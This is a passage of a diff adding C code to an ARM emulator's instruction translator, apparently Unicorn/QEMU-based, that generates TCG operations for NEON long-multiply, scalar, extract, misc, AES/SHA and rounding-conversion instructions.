+ switch ((size << 1) | u) { + case 0: + gen_helper_neon_abdl_s16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 1: + gen_helper_neon_abdl_u16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 2: + gen_helper_neon_abdl_s32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 3: + gen_helper_neon_abdl_u32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 4: + gen_helper_neon_abdl_s64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 5: + gen_helper_neon_abdl_u64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 8: case 9: case 10: case 11: case 12: case 13: + /* VMLAL, VQDMLAL, VMLSL, VQDMLSL, VMULL, VQDMULL */ + gen_neon_mull(s, tcg_ctx->cpu_V0, tmp, tmp2, size, u); + break; + case 14: /* Polynomial VMULL */ + gen_helper_neon_mull_p8(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + default: /* 15 is RESERVED: caught earlier */ + abort(); + } + if (op == 13) { + /* VQDMULL */ + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } else if (op == 5 || (op >= 8 && op <= 11)) { + /* Accumulate. */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + switch (op) { + case 10: /* VMLSL */ + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + /* Fall through */ + case 5: case 8: /* VABAL, VMLAL */ + gen_neon_addl(s, size); + break; + case 9: case 11: /* VQDMLAL, VQDMLSL */ + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + if (op == 11) { + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + } + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); + break; + default: + abort(); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } else if (op == 4 || op == 6) { + /* Narrowing operation. 
*/ + tmp = tcg_temp_new_i32(tcg_ctx); + if (!u) { + switch (size) { + case 0: + gen_helper_neon_narrow_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 1: + gen_helper_neon_narrow_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 2: + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + default: abort(); + } + } else { + switch (size) { + case 0: + gen_helper_neon_narrow_round_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 1: + gen_helper_neon_narrow_round_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 2: + tcg_gen_addi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 1u << 31); + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + default: abort(); + } + } + if (pass == 0) { + tmp3 = tmp; + } else { + neon_store_reg(tcg_ctx, rd, 0, tmp3); + neon_store_reg(tcg_ctx, rd, 1, tmp); + } + } else { + /* Write back the result. */ + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + } + } else { + /* Two registers and a scalar. NB that for ops of this form + * the ARM ARM labels bit 24 as Q, but it is in our variable + * 'u', not 'q'. + */ + if (size == 0) { + return 1; + } + switch (op) { + case 1: /* Float VMLA scalar */ + case 5: /* Floating point VMLS scalar */ + case 9: /* Floating point VMUL scalar */ + if (size == 1) { + return 1; + } + /* fall through */ + case 0: /* Integer VMLA scalar */ + case 4: /* Integer VMLS scalar */ + case 8: /* Integer VMUL scalar */ + case 12: /* VQDMULH scalar */ + case 13: /* VQRDMULH scalar */ + if (u && ((rd | rn) & 1)) { + return 1; + } + tmp = neon_get_scalar(s, size, rm); + neon_store_scratch(tcg_ctx, 0, tmp); + for (pass = 0; pass < (u ? 
4 : 2); pass++) { + tmp = neon_load_scratch(tcg_ctx, 0); + tmp2 = neon_load_reg(tcg_ctx, rn, pass); + if (op == 12) { + if (size == 1) { + gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } else { + gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + } else if (op == 13) { + if (size == 1) { + gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } else { + gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + } else if (op & 1) { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + } else { + switch (size) { + case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op < 8) { + /* Accumulate. */ + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + switch (op) { + case 0: + gen_neon_add(s, size, tmp, tmp2); + break; + case 1: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case 4: + gen_neon_rsb(s, size, tmp, tmp2); + break; + case 5: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + break; + case 3: /* VQDMLAL scalar */ + case 7: /* VQDMLSL scalar */ + case 11: /* VQDMULL scalar */ + if (u == 1) { + return 1; + } + /* fall through */ + case 2: /* VMLAL scalar */ + case 6: /* VMLSL scalar */ + case 10: /* VMULL scalar */ + if (rd & 1) { + return 1; + } + tmp2 = neon_get_scalar(s, size, rm); + /* We need a copy of tmp2 because gen_neon_mull + * deletes it 
during pass 0. */ + tmp4 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp4, tmp2); + tmp3 = neon_load_reg(tcg_ctx, rn, 1); + + for (pass = 0; pass < 2; pass++) { + if (pass == 0) { + tmp = neon_load_reg(tcg_ctx, rn, 0); + } else { + tmp = tmp3; + tmp2 = tmp4; + } + gen_neon_mull(s, tcg_ctx->cpu_V0, tmp, tmp2, size, u); + if (op != 11) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + } + switch (op) { + case 6: + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + /* Fall through */ + case 2: + gen_neon_addl(s, size); + break; + case 3: case 7: + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + if (op == 7) { + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + } + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); + break; + case 10: + /* no-op */ + break; + case 11: + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + break; + default: + abort(); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + + + break; + default: /* 14 and 15 are RESERVED */ + return 1; + } + } + } else { /* size == 3 */ + if (!u) { + /* Extract. 
*/ + imm = (insn >> 8) & 0xf; + + if (imm > 7 && !q) + return 1; + + if (q && ((rd | rn | rm) & 1)) { + return 1; + } + + if (imm == 0) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); + if (q) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rn + 1); + } + } else if (imm == 8) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); + if (q) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); + } + } else if (q) { + tmp64 = tcg_temp_new_i64(tcg_ctx); + if (imm < 8) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); + neon_load_reg64(tcg_ctx, tmp64, rn + 1); + } else { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); + neon_load_reg64(tcg_ctx, tmp64, rm); + } + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, (imm & 7) * 8); + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tmp64, 64 - ((imm & 7) * 8)); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + if (imm < 8) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); + } else { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); + imm -= 8; + } + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, imm * 8); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + /* BUGFIX */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, imm * 8); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd); + if (q) { + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + 1); + } + } else if ((insn & (1 << 11)) == 0) { + /* Two register misc. 
*/ + op = ((insn >> 12) & 0x30) | ((insn >> 7) & 0xf); + size = (insn >> 18) & 3; + /* UNDEF for unknown op values and bad op-size combinations */ + if ((neon_2rm_sizes[op] & (1 << size)) == 0) { + return 1; + } + if ((op != NEON_2RM_VMOVN && op != NEON_2RM_VQMOVN) && + q && ((rm | rd) & 1)) { + return 1; + } + switch (op) { + case NEON_2RM_VREV64: + for (pass = 0; pass < (q ? 2 : 1); pass++) { + tmp = neon_load_reg(tcg_ctx, rm, pass * 2); + tmp2 = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); + switch (size) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; + case 1: gen_swap_half(s, tmp); break; + case 2: /* no-op */ break; + default: abort(); + } + neon_store_reg(tcg_ctx, rd, pass * 2 + 1, tmp); + if (size == 2) { + neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); + } else { + switch (size) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp2, tmp2); break; + case 1: gen_swap_half(s, tmp2); break; + default: abort(); + } + neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); + } + } + break; + case NEON_2RM_VPADDL: case NEON_2RM_VPADDL_U: + case NEON_2RM_VPADAL: case NEON_2RM_VPADAL_U: + for (pass = 0; pass < q + 1; pass++) { + tmp = neon_load_reg(tcg_ctx, rm, pass * 2); + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, op & 1); + tmp = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); + gen_neon_widen(s, tcg_ctx->cpu_V1, tmp, size, op & 1); + switch (size) { + case 0: gen_helper_neon_paddl_u16(tcg_ctx, CPU_V001); break; + case 1: gen_helper_neon_paddl_u32(tcg_ctx, CPU_V001); break; + case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; + default: abort(); + } + if (op >= NEON_2RM_VPADAL) { + /* Accumulate. */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + gen_neon_addl(s, size); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + break; + case NEON_2RM_VTRN: + if (size == 2) { + int n; + for (n = 0; n < (q ? 
4 : 2); n += 2) { + tmp = neon_load_reg(tcg_ctx, rm, n); + tmp2 = neon_load_reg(tcg_ctx, rd, n + 1); + neon_store_reg(tcg_ctx, rm, n, tmp2); + neon_store_reg(tcg_ctx, rd, n + 1, tmp); + } + } else { + goto elementwise; + } + break; + case NEON_2RM_VUZP: + if (gen_neon_unzip(tcg_ctx, rd, rm, size, q)) { + return 1; + } + break; + case NEON_2RM_VZIP: + if (gen_neon_zip(tcg_ctx, rd, rm, size, q)) { + return 1; + } + break; + case NEON_2RM_VMOVN: case NEON_2RM_VQMOVN: + /* also VQMOVUN; op field and mnemonics don't line up */ + if (rm & 1) { + return 1; + } + TCGV_UNUSED_I32(tmp2); + for (pass = 0; pass < 2; pass++) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_neon_narrow_op(s, op == NEON_2RM_VMOVN, q, size, + tmp, tcg_ctx->cpu_V0); + if (pass == 0) { + tmp2 = tmp; + } else { + neon_store_reg(tcg_ctx, rd, 0, tmp2); + neon_store_reg(tcg_ctx, rd, 1, tmp); + } + } + break; + case NEON_2RM_VSHLL: + if (q || (rd & 1)) { + return 1; + } + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + for (pass = 0; pass < 2; pass++) { + if (pass == 1) + tmp = tmp2; + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, 1); + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 8 << size); + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + break; + case NEON_2RM_VCVT_F16_F32: + if (!arm_dc_feature(s, ARM_FEATURE_VFP_FP16) || + q || (rm & 1)) { + return 1; + } + tmp = tcg_temp_new_i32(tcg_ctx); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 0)); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 1)); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp2, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); + tcg_gen_ld_f32(tcg_ctx, 
tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 2)); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 3)); + neon_store_reg(tcg_ctx, rd, 0, tmp2); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp2, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); + neon_store_reg(tcg_ctx, rd, 1, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case NEON_2RM_VCVT_F32_F16: + if (!arm_dc_feature(s, ARM_FEATURE_VFP_FP16) || + q || (rd & 1)) { + return 1; + } + tmp3 = tcg_temp_new_i32(tcg_ctx); + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 0)); + tcg_gen_shri_i32(tcg_ctx, tmp3, tmp, 16); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 1)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp2); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 2)); + tcg_gen_shri_i32(tcg_ctx, tmp3, tmp2, 16); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 3)); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case NEON_2RM_AESE: case NEON_2RM_AESMC: + if (!arm_dc_feature(s, ARM_FEATURE_V8_AES) + || ((rm | rd) & 1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + + /* Bit 6 is 
the lowest opcode bit; it distinguishes between + * encryption (AESE/AESMC) and decryption (AESD/AESIMC) + */ + tmp3 = tcg_const_i32(tcg_ctx, extract32(insn, 6, 1)); + + if (op == NEON_2RM_AESE) { + gen_helper_crypto_aese(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + } else { + gen_helper_crypto_aesmc(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case NEON_2RM_SHA1H: + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA1) + || ((rm | rd) & 1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + + gen_helper_crypto_sha1h(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case NEON_2RM_SHA1SU1: + if ((rm | rd) & 1) { + return 1; + } + /* bit 6 (q): set -> SHA256SU0, cleared -> SHA1SU1 */ + if (q) { + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA256)) { + return 1; + } + } else if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + if (q) { + gen_helper_crypto_sha256su0(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + } else { + gen_helper_crypto_sha1su1(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + default: + elementwise: + for (pass = 0; pass < (q ? 
4 : 2); pass++) { + if (neon_2rm_is_float_op(op)) { + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, + neon_reg_offset(rm, pass)); + TCGV_UNUSED_I32(tmp); + } else { + tmp = neon_load_reg(tcg_ctx, rm, pass); + } + switch (op) { + case NEON_2RM_VREV32: + switch (size) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; + case 1: gen_swap_half(s, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VREV16: + gen_rev16(s, tmp); + break; + case NEON_2RM_VCLS: + switch (size) { + case 0: gen_helper_neon_cls_s8(tcg_ctx, tmp, tmp); break; + case 1: gen_helper_neon_cls_s16(tcg_ctx, tmp, tmp); break; + case 2: gen_helper_neon_cls_s32(tcg_ctx, tmp, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VCLZ: + switch (size) { + case 0: gen_helper_neon_clz_u8(tcg_ctx, tmp, tmp); break; + case 1: gen_helper_neon_clz_u16(tcg_ctx, tmp, tmp); break; + case 2: gen_helper_clz(tcg_ctx, tmp, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VCNT: + gen_helper_neon_cnt_u8(tcg_ctx, tmp, tmp); + break; + case NEON_2RM_VMVN: + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + break; + case NEON_2RM_VQABS: + switch (size) { + case 0: + gen_helper_neon_qabs_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 1: + gen_helper_neon_qabs_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 2: + gen_helper_neon_qabs_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + default: abort(); + } + break; + case NEON_2RM_VQNEG: + switch (size) { + case 0: + gen_helper_neon_qneg_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 1: + gen_helper_neon_qneg_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 2: + gen_helper_neon_qneg_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + default: abort(); + } + break; + case NEON_2RM_VCGT0: case NEON_2RM_VCLE0: + tmp2 = tcg_const_i32(tcg_ctx, 0); + switch(size) { + case 0: gen_helper_neon_cgt_s8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_cgt_s16(tcg_ctx, tmp, tmp, tmp2); break; + case 
2: gen_helper_neon_cgt_s32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op == NEON_2RM_VCLE0) { + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + } + break; + case NEON_2RM_VCGE0: case NEON_2RM_VCLT0: + tmp2 = tcg_const_i32(tcg_ctx, 0); + switch(size) { + case 0: gen_helper_neon_cge_s8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_cge_s16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_cge_s32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op == NEON_2RM_VCLT0) { + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + } + break; + case NEON_2RM_VCEQ0: + tmp2 = tcg_const_i32(tcg_ctx, 0); + switch(size) { + case 0: gen_helper_neon_ceq_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_ceq_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_ceq_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case NEON_2RM_VABS: + switch(size) { + case 0: gen_helper_neon_abs_s8(tcg_ctx, tmp, tmp); break; + case 1: gen_helper_neon_abs_s16(tcg_ctx, tmp, tmp); break; + case 2: tcg_gen_abs_i32(s, tmp, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VNEG: + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_neon_rsb(s, size, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case NEON_2RM_VCGT0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCGE0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCEQ0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + 
gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCLE0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCLT0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VABS_F: + gen_vfp_abs(s, 0); + break; + case NEON_2RM_VNEG_F: + gen_vfp_neg(s, 0); + break; + case NEON_2RM_VSWP: + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + neon_store_reg(tcg_ctx, rm, pass, tmp2); + break; + case NEON_2RM_VTRN: + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + switch (size) { + case 0: gen_neon_trn_u8(tcg_ctx, tmp, tmp2); break; + case 1: gen_neon_trn_u16(tcg_ctx, tmp, tmp2); break; + default: abort(); + } + neon_store_reg(tcg_ctx, rm, pass, tmp2); + break; + case NEON_2RM_VRINTN: + case NEON_2RM_VRINTA: + case NEON_2RM_VRINTM: + case NEON_2RM_VRINTP: + case NEON_2RM_VRINTZ: + { + TCGv_i32 tcg_rmode; + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + int rmode; + + if (op == NEON_2RM_VRINTZ) { + rmode = FPROUNDING_ZERO; + } else { + rmode = fp_decode_rm[((op & 0x6) >> 1) ^ 1]; + } + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + gen_helper_rints(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + break; + } + case NEON_2RM_VRINTX: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_rints_exact(tcg_ctx, 
tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCVTAU: + case NEON_2RM_VCVTAS: + case NEON_2RM_VCVTNU: + case NEON_2RM_VCVTNS: + case NEON_2RM_VCVTPU: + case NEON_2RM_VCVTPS: + case NEON_2RM_VCVTMU: + case NEON_2RM_VCVTMS: + { + bool is_signed = !extract32(insn, 7, 1); + TCGv_ptr fpst = get_fpstatus_ptr(s, 1); + TCGv_i32 tcg_rmode, tcg_shift; + int rmode = fp_decode_rm[extract32(insn, 8, 2)]; + + tcg_shift = tcg_const_i32(tcg_ctx, 0); + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + + if (is_signed) { + gen_helper_vfp_tosls(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, + tcg_shift, fpst); + } else { + gen_helper_vfp_touls(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, + tcg_shift, fpst); + } + + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case NEON_2RM_VRECPE: + { + TCGv_ptr fpstatus = 